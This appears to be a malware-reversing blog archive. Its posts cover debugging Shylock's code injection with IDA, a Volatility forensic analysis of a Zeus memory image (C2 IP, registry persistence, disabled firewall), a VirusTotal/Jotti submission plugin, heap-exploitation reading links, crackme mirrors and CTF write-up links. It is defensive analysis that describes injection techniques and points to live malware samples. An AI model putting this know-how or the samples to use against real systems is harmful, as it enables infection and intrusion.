malwarereversing

Hello all!  Today I wanted to talk about how you go about debugging/analyzing injected code.  In today’s malware environment a lot of malicious code doesn’t sit resident in memory in the context of it’s own process.  Back in the day you could look at task manager and recognize some weird executable that didn’t belong.  Those days are mostly over.  The new(er) malware classes will typically inject malicious code and hook dll’s in legitimate looking processes (explorer.exe, winlogon.exe, svchost.exe, etc.) to evade detection.  This makes analyzing malware trickier as you need a wider skill set than opening up a bad binary in IDA.  I’m going to shed some light on that process when you run into this type of malware.

First off we need to find some malware that uses code injection.  Code injection is usually done through the WriteProcessMemory API call through Windows.  I’ve provided a sample here which just happens to be the shylock malware that was posted recently at Contagio.   Download to follow along (the password is infected).  This executable injects code into the explorer.exe process of the target machine (xp sp3 os running on virtualbox).  This is what we will be working with if you want to follow along.  Now I haven’t done a complete in depth-analysis on this yet (it’s coming) but I suspect there isn’t any VM breakout that will totally hose your host OS.  If there is well sorry bout that! You need to also make sure your vm is accessible from your host machine.  I used ‘Host-Only Networking‘ and made sure the guest was accessible from my host box.

So once you have your vm up (and it has an IP you can reach from your host box).  You’ll need to copy over to the share a file that exists in your IDA Pro file to enable remote debugging. The file is “win32_remote.exe”.  This is a server that allows IDA to connect up to a port on a remote server debugging to debug across the world or across memory in the sense of a VM.  Now one caveat with this program is that it only allows one debugging session per server (depending on version,  newer versions of IDA support multiple debugging sessions over the same port).  So if you want to debug 2 programs at the same time (which we will be doing) you need two instances of this running on different ports.  You specify the port with the -p flag and there is NO SPACES after the -p switch so if you want to set it up on port 1000 you’d run “win32_remote -p1000″ from the command line.  Tiga also has posted a video tutorial about remote debugging with IDA.  His entire tutorial series is very good.

Open up a IDA Pro and Run -> Remote Win32 Debugger

Make sure your connection/paths are correct.

Click ok and  you’ll break at the entry point of the module

Now we’re going to set a breakpoint at WriteProcessMemory() (In IDA that equates to kernel32_WriteProcessMemory.  From here on out it will be referred to as WriteProcessMemory)

Hit f9 to go and it breaks on WriteProcessMemory() (How did I know how to break here?  I reversed the program roughly to get a feel for the program from the beginning up until this point.)

Now the code injection routine is a separate link here.  shows why we want to break on WriteProcessMemory().  There are a few basic methods on how to inject code into a process that is not yours  on Windows.  Here is a good breakdown describing those methods.  Most of the tactics revolve around WriteProcessMemory system call.  This particular piece of malware uses the third type of injection mentioned in the code project article.  Before this specific function was reached the malware took a snapshot of the system state and iterated through the processes until it found explorer.exe then called this function.  So the short version of the disassembly is that it opens the target process,  allocates some memory inside the process,  writes memory that was allocated (repeats 3 times), then starts a remote thread to execute this new code, wait for thread to exit then cleanup handles.  The reason 3 sections of memory are mapped into the target process is there is a loader there that reconstructs a dll in memory that is allocated inside Explorer.  This happens all before the exit status code is returned from the thread and the code is successfully injected.


Let’s fire up another IDA instance and use the Attach -> Remote Win32 Debugger and put in the port for the second server that was different than the first. Hit ok then we should see a process listing and let’s choose our injected process (explorer.exe) from the menu. If you took note of the injected code locations from CreateRemoteThread structure.

HANDLE WINAPI CreateRemoteThread(
  __in   HANDLE hProcess,
  __in   LPSECURITY_ATTRIBUTES lpThreadAttributes,
  __in   SIZE_T dwStackSize,
  __in   LPTHREAD_START_ROUTINE lpStartAddress,
  __in   LPVOID lpParameter,
  __in   DWORD dwCreationFlags,
  __out  LPDWORD lpThreadId
);
  __in   LPTHREAD_START_ROUTINE lpStartAddress,

lpStartAddress [in]

A pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process. For more information, see ThreadProc.

We can mark this location with a breakpoint once we attach to explorer.exe (before the thread is started but after the memory was written). Then we hit run in the shylock.exe (injector process) and then we should have a breakpoint hit in explorer.exe and sure enough we do. We can continue on reversing from here but let’s dump this segment and save it so we can annotate our debugging sessions and build on this previous knowledge. The way we can do this in IDA is take a memory snapshot.  We have to View -> Open Subviews -> Segments so that we can view a memory map. Noting our addresses from WriteProcessMemory we need to change those segments to Loader segments. Next up go to Debugger and take memory snapshot and choose only Loader Segments. If you notice in our column our only dump will be of the three sections we marked ‘Loader’ segment.  If you don’t mark them as Loader segments IDA will ignore them and exclude from putting them into the database/idb.  Here you have it and that’s how you dump injected code from any process with IDA Pro. Hope you enjoyed reading this article.

References:

[1] – Tiga’s IDA video tutorials

[2] – CodeProject Code Injection methods

[3] – Contagio malware dump

[4] – IDA Docs Page

[5] – Virtualbox Networking Doc

Posted in Uncategorized

Well I wanted to post another article about memory forensics with my favorite open source tool right now…. Volatility.  Can’t say enough great things about the documentation (very well written and expansive) and the community is very helpful in answering questions (even noobish ones).  So after I read MHL’s Stuxnet Analysis with Volatility 2.0 it inspired me to do my own sort of analysis with a different piece of malware to see how many artifacts I could come up with.  I’ll be referencing some in-depth deep dives to confirm the analysis.  At the end of the article the links will be given to those reports in full.  I’m going to assume no prior knowledge is known about Zeus.  We can use Volatility to start as well as confirm with multiple artifacts we are in fact infected with Zeus beyond any doubts.

Luckily for us we don’t have to infect a VM, take a memory dump and then analyze it (or have a friend ask for our help to cleanup their computer like here).  The folks at Volatility have provided a sample image that’s infected with Zeus for you to practice on.  They are in need of contribution with additional malware if you have any laying around that you’d like to share.  So download the image and follow along.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem imageinfo
Volatile Systems Volatility Framework 2.0
Suggested Profile(s) : WinXPSP3x86, WinXPSP2x86 (Instantiated with Win
XPSP2x86)
AS Layer1 : JKIA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (C:\RE\volatility2.0\py\volatility-2.0\zeus.vmem)
PAE type : PAE
DTB : 0x319000
KDBG : 0x80544ce0L
KPCR : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2010-08-15 19:17:56
Image local date and time : 2010-08-15 19:17:56
Number of Processors : 1
Image Type : Service Pack 2


So we can tell this is a XP SP2 image, no big surprise here.  Let’s grab a process listing.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem pslist
Volatile Systems Volatility Framework 2.0
Offset(V)  Name                 PID    PPID   Thds   Hnds   Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x810b1660 System                    4      0     58    379 1970-01-01 00:00:00
0xff2ab020 smss.exe                544      4      3     21 2010-08-11 06:06:21
0xff1ecda0 csrss.exe               608    544     10    410 2010-08-11 06:06:23
0xff1ec978 winlogon.exe            632    544     24    536 2010-08-11 06:06:23
0xff247020 services.exe            676    632     16    288 2010-08-11 06:06:24
0xff255020 lsass.exe               688    632     21    405 2010-08-11 06:06:24
0xff218230 vmacthlp.exe            844    676      1     37 2010-08-11 06:06:24
0x80ff88d8 svchost.exe             856    676     29    336 2010-08-11 06:06:24
0xff217560 svchost.exe             936    676     11    288 2010-08-11 06:06:24
0x80fbf910 svchost.exe            1028    676     88   1424 2010-08-11 06:06:24
0xff22d558 svchost.exe            1088    676      7     93 2010-08-11 06:06:25
0xff203b80 svchost.exe            1148    676     15    217 2010-08-11 06:06:26
0xff1d7da0 spoolsv.exe            1432    676     14    145 2010-08-11 06:06:26
0xff1b8b28 vmtoolsd.exe           1668    676      5    225 2010-08-11 06:06:35
0xff1fdc88 VMUpgradeHelper        1788    676      5    112 2010-08-11 06:06:38
0xff143b28 TPAutoConnSvc.e        1968    676      5    106 2010-08-11 06:06:39
0xff25a7e0 alg.exe                 216    676      8    120 2010-08-11 06:06:39
0xff364310 wscntfy.exe             888   1028      1     40 2010-08-11 06:06:49
0xff38b5f8 TPAutoConnect.e        1084   1968      1     68 2010-08-11 06:06:52
0x80f60da0 wuauclt.exe            1732   1028      7    189 2010-08-11 06:07:44
0xff3865d0 explorer.exe           1724   1708     13    326 2010-08-11 06:09:29
0xff3667e8 VMwareTray.exe          432   1724      1     60 2010-08-11 06:09:31
0xff374980 VMwareUser.exe          452   1724      8    207 2010-08-11 06:09:32
0x80f94588 wuauclt.exe             468   1028      4    142 2010-08-11 06:09:37
0xff224020 cmd.exe                 124   1668      0 ------ 2010-08-15 19:17:55


Nothing immediately stands out to me as they all look like legitimate processes that are running on the box.  Let’s see if any of them are hiding with a new command fresh out of 2.0 which is psxview.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem psxview
Volatile Systems Volatility Framework 2.0
Offset       Name                 Pid      pslist     psscan     thrdproc   psp
id     csr_hnds   csr_list
0x80fbf910L  svchost.exe          1028     1          1          1          1
1          0
0x80ff88d8L  svchost.exe          856      1          1          1          1
1          0
0xff1d7da0L  spoolsv.exe          1432     1          1          1          1
1          0
0x80f60da0L  wuauclt.exe          1732     1          1          1          1
1          0
0xff2ab020L  smss.exe             544      1          1          1          1
0          0
0xff3667e8L  VMwareTray.exe       432      1          1          1          1
1          0
0xff247020L  services.exe         676      1          1          1          1
1          0
0xff217560L  svchost.exe          936      1          1          1          1
1          0
0xff143b28L  TPAutoConnSvc.e      1968     1          1          1          1
1          0
0xff203b80L  svchost.exe          1148     1          1          1          1
1          0
0xff1b8b28L  vmtoolsd.exe         1668     1          1          1          1
1          0
0xff255020L  lsass.exe            688      1          1          1          1
1          0
0xff3865d0L  explorer.exe         1724     1          1          1          1
1          0
0xff22d558L  svchost.exe          1088     1          1          1          1
1          0
0xff374980L  VMwareUser.exe       452      1          1          1          1
1          0
0xff1fdc88L  VMUpgradeHelper      1788     1          1          1          1
1          0
0xff218230L  vmacthlp.exe         844      1          1          1          1
1          0
0xff364310L  wscntfy.exe          888      1          1          1          1
1          0
0x80f94588L  wuauclt.exe          468      1          1          1          1
1          0
0xff25a7e0L  alg.exe              216      1          1          1          1
1          0
0xff1ecda0L  csrss.exe            608      1          1          1          1
0          0
0xff38b5f8L  TPAutoConnect.e      1084     1          1          1          1
1          0
0xff1ec978L  winlogon.exe         632      1          1          1          1
1          0
0xff224020L  cmd.exe              124      1          0          0          1
0          0
0x810b1660L  System               4        1          1          1          1
0          0


This uses multiple methods for looking at processes artifacts in memory.  If you see any that are 0′s for psscan, pslist and thrdproc it’s an attempt to hide the process by DKOM (Direct Kernel Object Manipulation).  Nothing interesting here so let’s see about some network connections.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem connections
Volatile Systems Volatility Framework 2.0
Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ------


Well that’s disappointing.  No active connections at the time the memory dump was taken.  Let’s go a little deeper and scan for connections that may have been previously closed with connscan.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem connscan
Volatile Systems Volatility Framework 2.0
Offset     Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ------
0x02214988 172.16.176.143:1054       193.104.41.75:80             856
0x06015ab0 0.0.0.0:1056              193.104.41.75:80             856


Bingo!  We have 2 connections here that look to be listed to PID 856.  That’s SVChost which is odd.  Let’s see where these connections are located.  A whois report reveals that the IP is located in Moldova.

IP Address	193.104.41.75
Host	193.104.41.75
Location	MD, Moldova, Republic of
City	-, – -
Organization	PE Voronov Evgen Sergiyovich
ISP	PE Voronov Evgen Sergiyovich

It’s well known that a lot of malware calls Eastern Europe and Asia home.  So this is pretty suspicious but since it looks like all our processes appear legitimate we might be facing some malware that utilizes code injection.  To detect these types of processes MHL has released a great plugin here that utilizes malfind.  It will detect injected processes so let’s run that on our target image.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem malfind --dump-dir c:\re\zeus_demo
VMwareTray.exe       432    0x00d70000 0xd95fff00 VadS     0      PAGE_EXECUTE_R
EADWRITE
Dumped to: c:\re\zeus_demo\VMwareTray.exe.4be97e8.00d70000-00d95fff.dmp
0x00d70000   4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00    MZ..............

Disassembly:
00e30000: b835000000                       MOV EAX, 0x35
00e30005: e9cdd7ad7b                       JMP 0x7c90d7d7
00e3000a: b891000000                       MOV EAX, 0x91
00e3000f: e94fdfad7b                       JMP 0x7c90df63
00e30014: 8bff                             MOV EDI, EDI
00e30016: 55                               PUSH EBP
00e30017: 8bec                             MOV EBP, ESP
00e30019: e9ef173e76                       JMP 0x7721180d
00e3001e: 8bff                             MOV EDI, EDI
00e30020: 55                               PUSH EBP
[snip]

Well we have a lot of output so looks like a lot of our processes are injected with malcode.  The reason this plugin can find it is due to the fact of looking for kernel memory structures that work very closely with VirtualAlloc.  These memory structures are in a VAD tree and work closely with memory management aspects of the kernel.    There’s a lot more detailed explanation in the references section if you care to read further on the subject.  The plugin outputs hexdumps as well as assembly code at the base location of where the injected code was detected.  You can also pipe this output to a text file if it won’t fit in your console.

With all this output from our plugin let’s revisit our pstree command so we can get a hierarchical view on how the code injection may have cascaded.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem pstree
Volatile Systems Volatility Framework 2.0
Name                                        Pid    PPid   Thds   Hnds   Time
0x810B1660:System                               4      0     58    379 1970-01-
01 00:00:00
. 0xFF2AB020:smss.exe                          544      4      3     21 2010-08-
11 06:06:21
.. 0xFF1EC978:winlogon.exe                     632    544     24    536 2010-08-
11 06:06:23
... 0xFF255020:lsass.exe                       688    632     21    405 2010-08-
11 06:06:24
... 0xFF247020:services.exe                    676    632     16    288 2010-08-
11 06:06:24
.... 0xFF1B8B28:vmtoolsd.exe                  1668    676      5    225 2010-08-
11 06:06:35
..... 0xFF224020:cmd.exe                       124   1668      0 ------ 2010-08-
15 19:17:55
.... 0x80FF88D8:svchost.exe                    856    676     29    336 2010-08-
11 06:06:24
.... 0xFF1D7DA0:spoolsv.exe                   1432    676     14    145 2010-08-
11 06:06:26
.... 0x80FBF910:svchost.exe                   1028    676     88   1424 2010-08-
11 06:06:24
..... 0x80F60DA0:wuauclt.exe                  1732   1028      7    189 2010-08-
11 06:07:44
..... 0x80F94588:wuauclt.exe                   468   1028      4    142 2010-08-
11 06:09:37
..... 0xFF364310:wscntfy.exe                   888   1028      1     40 2010-08-
11 06:06:49
.... 0xFF217560:svchost.exe                    936    676     11    288 2010-08-
11 06:06:24
.... 0xFF143B28:TPAutoConnSvc.e               1968    676      5    106 2010-08-
11 06:06:39
..... 0xFF38B5F8:TPAutoConnect.e              1084   1968      1     68 2010-08-
11 06:06:52
.... 0xFF22D558:svchost.exe                   1088    676      7     93 2010-08-
11 06:06:25
.... 0xFF218230:vmacthlp.exe                   844    676      1     37 2010-08-
11 06:06:24
.... 0xFF25A7E0:alg.exe                        216    676      8    120 2010-08-
11 06:06:39
.... 0xFF203B80:svchost.exe                   1148    676     15    217 2010-08-
11 06:06:26
.... 0xFF1FDC88:VMUpgradeHelper               1788    676      5    112 2010-08-
11 06:06:38
.. 0xFF1ECDA0:csrss.exe                        608    544     10    410 2010-08-
11 06:06:23
0xFF3865D0:explorer.exe                      1724   1708     13    326 2010-08-
11 06:09:29
. 0xFF374980:VMwareUser.exe                    452   1724      8    207 2010-08-
11 06:09:32
. 0xFF3667E8:VMwareTray.exe                    432   1724      1     60 2010-08-
11 06:09:31


We did notice that services.exe looked to have some code injected into it.  Let’s take the parent process (winlogon.dmp that was dumped by malfind) and submit it to virustotal as PID 676 seems to be where the code injection is originating from in a hierarchical sense.

http://www.virustotal.com/file-scan/report.html?id=75a45694e30eecdb63d173fe18f2a6642113244e7049524d5331054c5ba07960-1316219032

Sure enough 26/44 say it’s malicious.  Seems most of the scans detect it as Zbot.   So let’s Google around find some reports and see if we can verify it’s presence elsewhere.  Now that we’re armed with some reports let’s verify some other artifacts on the system just to make sure this is Zbot.

“The install function searches for the “winlogon.exe” process, allocates some memory within it and decrypts itself into the process.”

Well what do you know it looks like Zbot/Zeus injects it’s code into winlogon.exe This was apparent after we did our malfind as it detected injected code into other processes. If you would use procexedump through volatility it would be fine if you submitted to an avscan as it uses the pe header to dump the memory image. The new code sections that were allocated and later written to will not be reflected in the original pe header that was loaded into memory. This is the exact reason why we had to use malfind (Thanks again MHL!) above and couldn’t just procdump based on pid.

“The bot executable is written to the hard drive as “C:\WINDOWS\system32\sdra64.exe”.”

Volatility has a useful plugin here that allows us to identify file handles that are still hanging around in memory filescan.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem filescan
Volatile Systems Volatility Framework 2.0
Offset(V) Obj Type #Ptr #Hnd Access Name
0x01090778 0x8109d560 1 0 R--r-d '\\WINDOWS\\system32\\winrnr.dll'
0x010915b0 0x8109d560 1 0 R--rwd '\\WINDOWS\\system32\\oleaut32.dll'
0x01091648 0x8109d560 1 0 R--rwd '\\WINDOWS\\system32\\rpcrt4.dll'
0x01091810 0x8109d560 1 0 R--rwd '\\WINDOWS\\system32\\csrss.exe'
0x01092270 0x8109d560 1 1 RW-rw- '\\WINDOWS\\WindowsUpdate.log'
[snip]
0x029d9b28 0x8109d560 1 1 R----- '\\WINDOWS\\system32\\sdra64.exe'
0x029d9cd8 0x8109d560 1 0 -WD--- '\\WINDOWS\\system32\\sdra64.exe'
[snip]


“The directory “C:\WINDOWS\system32\lowsec\” is created. This directory is not visible in Windows Explorer but can be seen from the command line. Its purpose is to contain the following files:

local.ds: Contains the most recently downloaded DynamicConfig file.
user.ds: Contains logged information.
user.ds.lll: Temporarily created if transmission of logs to the drop server fails.
“

These artifacts can also be found in the above file scan to further bolster the case that this is definitely Zeus.

“The Winlogon (“HKLM/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon”) registry key’s value is appended with the path of the bot executable: C:/WINDOWS/system32/sdra64.exe. This will cause the bot to execute when the computer restarts.”

Volatility sure enough has a feature to allow us to investigate registry entries. Namely the printkey command. So let’s check the reg key from our Zbot analysis to see that this is here too.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem printkey -K "Mi
crosoft\Windows NT\CurrentVersion\Winlogon"
Volatile Systems Volatility Framework 2.0
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\software
Key name: Winlogon (S)
Last updated: 2010-08-15 19:17:23
Subkeys:
(S) GPExtensions
(S) Notify
(S) SpecialAccounts
(V) Credentials

Values:
REG_DWORD AutoRestartShell : (S) 1
REG_SZ DefaultDomainName : (S) BILLY-DB5B96DD3
REG_SZ DefaultUserName : (S) Administrator
REG_SZ LegalNoticeCaption : (S)
REG_SZ LegalNoticeText : (S)
REG_SZ PowerdownAfterShutdown : (S) 0
REG_SZ ReportBootOk : (S) 1
REG_SZ Shell : (S) Explorer.exe
REG_SZ ShutdownWithoutLogon : (S) 0
REG_SZ System : (S)
REG_SZ Userinit : (S) C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\
system32\sdra64.exe,
REG_SZ VmApplet : (S) rundll32 shell32,Control_RunDLL “sysdm.cpl”

REG_DWORD SfcQuota : (S) 4294967295
REG_SZ allocatecdroms : (S) 0
REG_SZ allocatedasd : (S) 0
REG_SZ allocatefloppies : (S) 0
REG_SZ cachedlogonscount : (S) 10
REG_DWORD forceunlocklogon : (S) 0
REG_DWORD passwordexpirywarning : (S) 14
REG_SZ scremoveoption : (S) 0
REG_DWORD AllowMultipleTSSessions : (S) 1
REG_EXPAND_SZ UIHost : (S) logonui.exe
REG_DWORD LogonType : (S) 1
REG_SZ Background : (S) 0 0 0
REG_SZ AutoAdminLogon : (S) 0
REG_SZ DebugServerCommand : (S) no
REG_DWORD SFCDisable : (S) 0
REG_SZ WinStationsDisabled : (S) 0
REG_DWORD HibernationPreviouslyEnabled : (S) 1
REG_DWORD ShowLogonOptions : (S) 0
REG_SZ AltDefaultUserName : (S) Administrator
REG_SZ AltDefaultDomainName : (S) BILLY-DB5B96DD3

Well that key is certainly apparent and this is our persistence mechanism. So the Zeus/Zbot injector process is called at start-up to insert it’s hooks and malicious code in our legitimate looking processes to evade detection. This would be something you’d want to clean up if you were re-mediating the system as well.

“The Windows XP firewall is disabled. This causes a Windows Security Center warning icon to appear in the system tray, the only visible indication that the computer has been infected.”

It looks like Zeus/Zbot also takes care of disabling the Windows Firewall so your not annoyed with any popups while it’s pilfering through your banking data. Googling around there are some registry forensics blogs that keep track of the location for windows firewall settings. Using our command printkey we can detect if this is enabled or disabled in this specific image.


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem printkey -K "Co
ntrolSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"
Volatile Systems Volatility Framework 2.0
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: StandardProfile (S)
Last updated: 2010-08-15 19:17:24

Subkeys:
(S) AuthorizedApplications

Values:
REG_DWORD EnableFirewall : (S) 0

So the firewall is currently disabled and if you notice the timestamp on the key as well. It looks like this was last updated at 2010-8-15 at 19:17:24. This is tidbit of information that you could use in a timeline analysis if you had to document to this level of detail. The specific Zeus/Zbot may not modify this key every time but check if its set according to it’s specifications. I’m not sure as I don’t have the file but it would be a reasonable assumption. Also the EnableFirewall key was not in the DomainProfile but only the StandardProfile for you registry pros out there.

“A closer look at its binary file reveals that the spyware was designed to monitor known ZBOT mutexes, _AVIRA_ and __SYSTEM__.”


C:\RE\volatility2.0\py\volatility-2.0>python vol.py -f zeus.vmem mutantscan
Volatile Systems Volatility Framework 2.0
[snip]
0x05ca17e8 0x810ae5e0 2 1 1 0x00000000 '_AVIRA_2108'
[snip]


Well there is certainly a mutex that has been recent in memory for AVIRA which ironically enough is the name of an antivirus engine. It was sent to poke fun at the anti-virus companies by the programmer’s of Zeus. It also looks from the above mutex that we have a 1.x version of Zeus/Zbot as in 2.x versions they use randomly generated GUID’s over mutexes to communicate.

So there we have it using Volatility we can get a look at a Zeus/Zbot infection and determine steps here for possible remediation just based on a memory dump. We’d have more resources if we were able to have access to the system as well so we could study the injector process to see if it has any other persistence mechanisms. It’s doubtful since this matches so closely to the typical Zeus/Zbot signature. I hope you enjoyed reading this article!

Edit: Looks like another Zeus article was written and is linked here to give you another viewpoint on this piece of malware.

References:

[1] – http://www.fortiguard.com/analysis/zeusanalysis.html

[2] – http://www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf

[3] – http://www.eptuners.com/forensics/contents/examination.htm

[4] – http://www.sans.org/reading_room/whitepapers/malicious/clash-titans-zeus-spyeye_33393

[5] – http://www.symantec.com/connect/blogs/brief-look-zeuszbot-20

Posted in incident response, Malware
Tags: incident response, ir, volatility, zeus

I came across a program the other day that is very powerful when it comes to IR (Incident Response).  So wanting to learn more about the platform I dived right in and decided to create a plugin. What if you could automatically carve out a file from a memory image and submit  said carving to an online virus scanning service?  That’d be awesome and make for quick work to triage any memory dumps you may have laying around, assuming you can isolate the suspicious process.  This idea was born out of a larger project in development called Avalanche.  It’s goal is to bring a lot of these tools together for a quick analysis ala Mandiant Redline or HB Gary Responder Pro but built around Python.

For those who don’t know what Volatility is.  It’s a great open source memory forensics framework written in python.  It’s being actively developed by a great community (it even supports Windows 8 at the time of this writing).  The tool operates on memory dumps.  These are dumps of physical ram to an image much like a disk image but just has snapshots of the current state of your machine.  There are some advantages to full disk dumps such as size and context.  Some information exists in memory that is difficult to discern from disk images (api hooking, process injection, listening sockets, current and previous ip connections, hidden processes).  Memory dumps make these data points easily accessible.

Volatility has some practice images on their wiki that you can play with as well.  The install of the plugin is pretty simple.  Download the file and unzip it to the plugins directory.  Now if you want to use VirusTotal you will need to hardcode your api key into avsubmit.py as well as download SimpleJson.  AVsubmit is code that was shared via MHL in the Malware Analyst’s Cookbook.  All of it’s code snippets are freely available here.  I’ve heard great things about the book and mine is in the mail.

So usage is pretty simple.  Run this command.

python vol.py vscan -f target.img -p 100 -s Jotti

3a
Trying to get results for the next 600 seconds...
Try 0
Try 1
Try 2
Try 3
Try 4
Try 5
drweb => scan clean
fsecure => scan clean
cpsecure => scan clean
arcavir => scan clean
fprot => scan clean
avast => scan clean
vba32 => scan clean
clamav => scan clean
gdata => scan clean
kaspersky => scan clean
bitdefender => scan clean
panda => scan clean
sophos => scan clean
avira => scan clean
ikarus => scan clean
avg => scan clean
nod32 => scan clean
emsisoft => scan clean
quickheal => scan clean
virusbuster => scan clean
Added sample to database with ID 4
Finished.

This dumps a target process from a memory image and submits it to the service of your choosing.  Be warned that if the process has code injected into it may yield some false positives (Zeus/Zbot).  In this case I use the malfind plugin via MHL’s malware.py scripts and it will dump out a process based on the VAD tree entries that it finds suspicious.  After these items are dumped to disk you can still use the avscan plugin by just passing the -F flag to specify a file that has recently been dumped.

python vol.py -f zeus.vmem vscan -E c:\zeus\winlogon.exe.66f0978.00ae0000-00b05fff.dmp -S jotti
Volatile Systems Volatility Framework 2.0
[*] Submitting [c:\zeus\winlogon.exe.66f0978.00ae0000-00b05fff.dmp] to [jotti
File already exists, initialization not required.
[*] Using Jotti...
Initialized session cookie: sessionid=7e90a75eb406c0f64ac3662a3a5e0ca325bc94f6
Initialized APC: 55521be59f3ec0b6385dfb43eb6a3a7885ded3c7
Checking Jotti's databse for file with MD5: B5CAE4218DC957F4419AEAA675C21B7F
You can find the existing analysis here:

37
Trying to get results for the next 600 seconds...
Try 0
drweb => Trojan.PWS.Panda.199
fsecure => Trojan.Spy.Zbot.EHO
cpsecure => scan clean
arcavir => scan clean
fprot => W32/Zbot.AF.gen!Eldorado
avast => Win32:Zbot-BCW
vba32 => scan clean
clamav => scan clean
gdata => Trojan.Spy.Zbot.EHO
kaspersky => scan clean
bitdefender => Trojan.Spy.Zbot.EHO
panda => scan clean
sophos => Sus/Behav-1010
avira => TR/Hijacker.Gen
ikarus => Trojan-Spy.Zbot
avg => Win32/Cryptor
nod32 => Win32/Kryptik.AY
emsisoft => Trojan-Spy.Zbot!IK
quickheal => scan clean
virusbuster => scan clean
Added sample to database with ID 8
Finished.

You could also extend the plugin to do this for files that are going to be dumped on disk by malfind.py.  I hope you find the plugin useful and perhaps have inspired you to contribute something as well to this awesome project!  Download the plugin here.

Posted in incident response, Malware
Tags: incident response, ir, malware, python, volatility, volatility plugin

Well after looking at some bugs the other day I determined that my lack of knowledge on the heap was a problem. To mitigate this I’m going to include a lot of links that pertain to heap information. This way I can come back to review it and become more familiar with this aspect of memory management. Links are in no particular order. Please note not all the techniques here are valid with the latest technology but this should be a good start on understanding the heap and it’s implications when dealing with exploitation. Please add more links to heap knowledge in comments if you know some must reads.

MALLOC DES-MALEFICARUM (phrack BlackAngel)
Ben Hawkes Vista Heap Attacks good overview of heap layout/attack vectors and recipes as he calls them to setup your heap state.
Low Fragmentation Heap by Chris Valasek given in Argentina at ektoparty? Same one was delivered at Blackhat USA 2010
Advanced Doug lea’s malloc exploits Phrack
Max’s Vudoo Paper in Phrack
Dion Blazakis JIT Spraying
Filling Adobe’s Heap good overview on how to fillup the heap with data in different programs. Not limited to adobe nor javascript.
Once upon a free() Phrack
Heap Feng Shui by Alexander Sotirov Great talk on heap techniques and he releases his heaplib.js code to manipulate the heap in javascript.
HeapDraw visualization tool for seeing the output of memory allocations in your target application.
Heap Massage by Gera
Yet another free() article at phrack
Sean Heelan TCMalloc Scripts importance of scripts and heap information
Reliable windows heap exploits
Double free vulnerabilities
Huku’s phrack article on another free()
Runtime detection of heap overflows
Heaps About Heaps by Insomniac Security

MSDN Related articles
Using pageheap.exe to debug heap corruption bugs
Windows 7 Fault Tolerant Heap Details
Preventing usermode heap corruption in MS Windows

Posted in Uncategorized
Tags: exploitation, heap, heap spray

Well after the disappointing take down of Crackmes.de I took it upon myself to mirror the crackmes (thanks for the inspiration @darelgrif) as well as the solutions that were on that site. Please find the following linked zip that contains almost 1000 crackme’s for all levels. Solutions will be coming in the following days. Please enjoy and mirror/spread. Nothing disappears once it’s been posted on the internet. If your curious how I did this python and urllib2 scraped the links from a popular archiving site. Enjoy!

Crackmes.de collection mirror #1
Crackmes.de collection mirror #2
Crackmes.de collection mirror #3
Crackmes.de collection mirror #4
Crackmes.de collection mirror #5
Crackmes.de collection mirror #6

Solutions are below.

Crackmes.de solutions mirror#1
Crackmes.de solutions mirror#2
Crackmes.de solutions mirror#3

Posted in Uncategorized

So Codegate 2011 just wrapped up this past weekend and it was a great competition. Some very unique challenges to read over in the coming days but here is a collection of write ups I’ve found so far. If you find some that are missing feel free to comment and I’ll edit them in. I’m sure more will be published in the coming days on Twitter using #codegate. Enjoy!

Sourcecode for all the challenges…

http://repo.shell-storm.org/CTF/CodeGate-2011/

Vuln 100

http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http%3A%2F%2Fwww.lestutosdenico.com%2Fevenements%2Fwriteup-codegate-2011

http://www.lestutosdenico.com/evenements/writeup-codegate-2011 (French)

Vuln 200

Vuln 300

http://auntitled.blogspot.com/2011/03/codegate-ctf-2011-vuln300-writeup.html

Vuln 400

Vuln 500

Issue 100

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Issue 200

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Issue 300

Issue 400

Issue 500

http://securityblackswan.blogspot.com/2011/03/codegate-yut-2011-issue-500-writeup.html

Forensic 100

http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http%3A%2F%2Fwww.lestutosdenico.com%2Fevenements%2Fwriteup-codegate-2011

http://www.lestutosdenico.com/evenements/writeup-codegate-2011 (French)

Forensic 200

http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http%3A%2F%2Fwww.lestutosdenico.com%2Fevenements%2Fwriteup-codegate-2011

http://www.lestutosdenico.com/evenements/writeup-codegate-2011 (French)

Forensic 300

http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http%3A%2F%2Fwww.sinfocol.org%2F2011%2F03%2Fwriteup-forensics300-codegate-2011%2F

